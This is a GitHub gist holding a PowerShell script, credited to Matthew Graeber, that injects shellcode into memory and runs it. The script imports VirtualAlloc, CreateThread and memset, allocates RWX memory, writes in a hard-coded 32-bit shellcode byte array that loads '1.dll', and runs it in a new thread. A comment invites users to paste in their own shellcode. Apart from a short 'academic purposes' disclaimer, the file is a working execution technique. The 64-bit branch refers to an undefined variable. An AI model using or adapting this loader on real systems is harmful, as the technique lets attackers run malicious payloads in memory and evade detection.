@adelmas
Last active March 25, 2022 02:09
<#
Powershell Code Execution 'Exploit'
Author: Matthew Graeber
Disclaimer: This code is provided for academic purposes only and should not be used for evil. You are liable for your own actions.
#>
# Import required functions
$code = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
"@
# Add CSharp code as a class recognized by Powershell
$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru
# Copy and paste your shellcode here in the form 0xXX.
# 32-bit payload
# Locates and calls LoadLibrary('1.dll')
[Byte[]]$sc32 = 0x60, 0x83, 0xC4, 0xC0, 0xFC, 0x31, 0xD2, 0x64, 0x8B, 0x52, 0x30, 0x8B, 0x52, 0x0C, 0x8B, 0x52, 0x14, 0x8B, 0x72, 0x28, 0xB9, 0x18, 0x00, 0x00, 0x00, 0x31, 0xFF, 0x31, 0xC0, 0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 0x20, 0xC1, 0xCF, 0x0D, 0x01, 0xC7, 0xE2, 0xF0, 0x81, 0xFF, 0x5B, 0xBC, 0x4A, 0x6A, 0x8B, 0x5A, 0x10, 0x89, 0x5D, 0xFC, 0x8B, 0x12, 0x75, 0xD6, 0x8B, 0x4B, 0x3C, 0x01, 0xD9, 0x83, 0xC1, 0x18, 0x83, 0xC1, 0x60, 0x89, 0x4D, 0xF8, 0x8B, 0x09, 0x01, 0xD9, 0x51, 0x83, 0xC1, 0x24, 0x8B, 0x09, 0x01, 0xD9, 0x89, 0x4D, 0xF4, 0x59, 0x51, 0x83, 0xC1, 0x1C, 0x8B, 0x09, 0x01, 0xD9, 0x89, 0x4D, 0xF0, 0x59, 0x83, 0xC1, 0x20, 0x8B, 0x09, 0x01, 0xD9, 0x8B, 0x11, 0x01, 0xDA, 0x89, 0xD6, 0x51, 0xB9, 0x18, 0x00, 0x00, 0x00, 0x31, 0xFF, 0x31, 0xC0, 0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 0x20, 0xC1, 0xCF, 0x0D, 0x01, 0xC7, 0xE2, 0xF0, 0x81, 0xFF, 0xBA, 0x18, 0x7B, 0x11, 0x59, 0x74, 0x15, 0x83, 0xC1, 0x04, 0x8B, 0x11, 0x03, 0x55, 0xFC, 0x89, 0xD6, 0x8B, 0x55, 0xF4, 0x83, 0xC2, 0x02, 0x89, 0x55, 0xF4, 0xEB, 0xCA, 0x8B, 0x55, 0xF0, 0x03, 0x55, 0xFC, 0x31, 0xC0, 0x8B, 0x4D, 0xF4, 0x66, 0x8B, 0x01, 0xBA, 0x04, 0x00, 0x00, 0x00, 0xF7, 0xE2, 0x8B, 0x55, 0xF0, 0x01, 0xC2, 0x8B, 0x12, 0x03, 0x55, 0xFC, 0xC6, 0x45, 0xE3, 0x00, 0xC6, 0x45, 0xE2, 0x6C, 0xC6, 0x45, 0xE1, 0x6C, 0xC6, 0x45, 0xE0, 0x64, 0xC6, 0x45, 0xDF, 0x2E, 0xC6, 0x45, 0xDE, 0x31, 0x8D, 0x45, 0xDE, 0x50, 0xFF, 0xD2, 0x61
[Byte[]]$sc = $sc32
if ([IntPtr]::Size -eq 8) {$sc = $sc64}
# Calculate correct size param for VirtualAlloc
$size = 0x1000
if ($sc.Length -gt 0x1000) {$size = $sc.Length}
# Allocate a page of memory. This will only work if the size parameter (3rd param) is at least 0x1000.
# Allocate RWX memory block
$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40)
# I could have more easily used memcpy but that would have required the use of a particular .NET class to cast $sc as an IntPtr. I wanted to get this working without needing additional .NET classes. I prefer to KISS (keep it simple, stupid).
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)}
# Execute your payload
$winFunc::CreateThread(0,0,$x,0,0,0)
sleep(10);
adelmas commented Aug 15, 2016